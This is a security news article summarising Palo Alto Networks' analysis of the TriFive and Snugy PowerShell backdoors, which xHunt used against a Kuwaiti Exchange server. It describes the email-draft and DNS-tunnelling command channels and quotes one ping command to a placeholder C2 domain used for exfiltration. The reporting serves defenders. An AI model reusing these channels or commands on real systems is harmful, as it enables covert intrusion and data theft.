Security experts from Palo Alto Networks have spotted two never-before-detected Powershell backdoors while investigating an attack on Microsoft Exchange servers at an organization in Kuwait.
Experts attribute the attack to a known threat actor tracked as xHunt, aka Hive0081, which was first discovered in 2018. The group already targeted in the past the Kuwait government, he also carried out attacks against shipping and transportation organizations.
In the recent attack, the attackers used two newly discovered backdoors tracked as ‘TriFive’ and ‘Snugy,’ the latter is a variant of a previously discovered PowerShell-based backdoor tracked as CASHY200.
“The TriFive and Snugy backdoors are PowerShell scripts that provide backdoor access to the compromised Exchange server, using different command and control (C2) channels to communicate with the actors. The TriFive backdoor uses an email-based channel that uses Exchange Web Services (EWS) to create drafts within the Deleted Items folder of a compromised email account.” reads the analysis published by the experts. “The Snugy backdoor uses a DNS tunneling channel to run commands on the compromised server. We will provide an overview of these two backdoors since they differ from tools previously used in the campaign.”
In backdoor samples spotted by the researchers on the compromised Exchange server of a Kuwait government organization used covert channels for C2 communications, including DNS tunneling and an email-based channel using drafts in the Deleted Items folder of a compromised email account.
At the time of the publishing of the report, the experts have yet to determine how threat actors have had access to the Exchange server.
The attack was spotted in September when Palo Alto Networks was notified that threat actors breached an organization in Kuwait. The attackers were sending suspicious commands to the Exchange server via the Internet Information Services (IIS) process w3wp.exe.
Further investigation allowed the researchers to discover two scheduled tasks (“ResolutionHosts” and “ResolutionsHosts” created within the c:\Windows\System32\Tasks\Microsoft\Windows\WDI folder) created by the attackers to achieve persistence. The tasks were created well before the dates of the collected logs, both would run malicious PowerShell scripts, a circumstance that suggests that attackers had access to the server prior to the logs.
“The commands executed by the two tasks attempt to run splwow64.ps1 and OfficeIntegrator.ps1, which are backdoors that we call TriFive and a variant of CASHY200 that we call Snugy, respectively.” continues the analysis. “The scripts were stored in two separate folders on the system, which is likely an attempt to avoid both backdoors being discovered and removed.”
Let’s go deep into the analysis of the two back doors;
TriFive backdoor is executed every five minutes via a scheduled task, it provides backdoor access to the Exchange server by logging into a legitimate user’s inbox and obtaining a PowerShell script from an email draft within the deleted emails folder.
The threat actor would log into the same legitimate email account and create an email draft with a subject of “555,” which includes the command in an encrypted and base64 encoded format.
The backdoor would then send the command results back to the attackers by setting the encoded ciphertext as the message body of an email draft, and saving the email again in the Deleted Items folder with the subject of “555s.”
The Snugy powerShell-based backdoor uses a DNS-tunneling channel to run commands on the compromised Exchange server.
Threat actors leverage the Snugy backdoor to obtain the system’s info, run commands and exfiltrate data from the compromised server.
“The Snugy variant uses the following command to ping a custom crafted domain, which ultimately attempts to resolve the domain before sending the ICMP requests to the resolving IP address:
cmd /c ping -n 1 <custom crafted sub-domain>.<C2 domain>
Snugy will extract the IP address that the ping application resolved using the following regular expression to gather the IP address from the ping results:
continues the analysis.
“Based on the exfiltrated data from within the subdomains, we were able to determine the actors ran ipconfig /all and dir. Unfortunately, we only had a subset of the requests so the data exfiltrated was truncated, which also suggests that the actors likely ran other commands that we did not observe.”
The xHunt campaign is still ongoing, researchers shared Indicators of Compromise (IoCs) to allows administrators to check if their environments have been compromised.
(SecurityAffairs – hacking, Microsoft Exchange)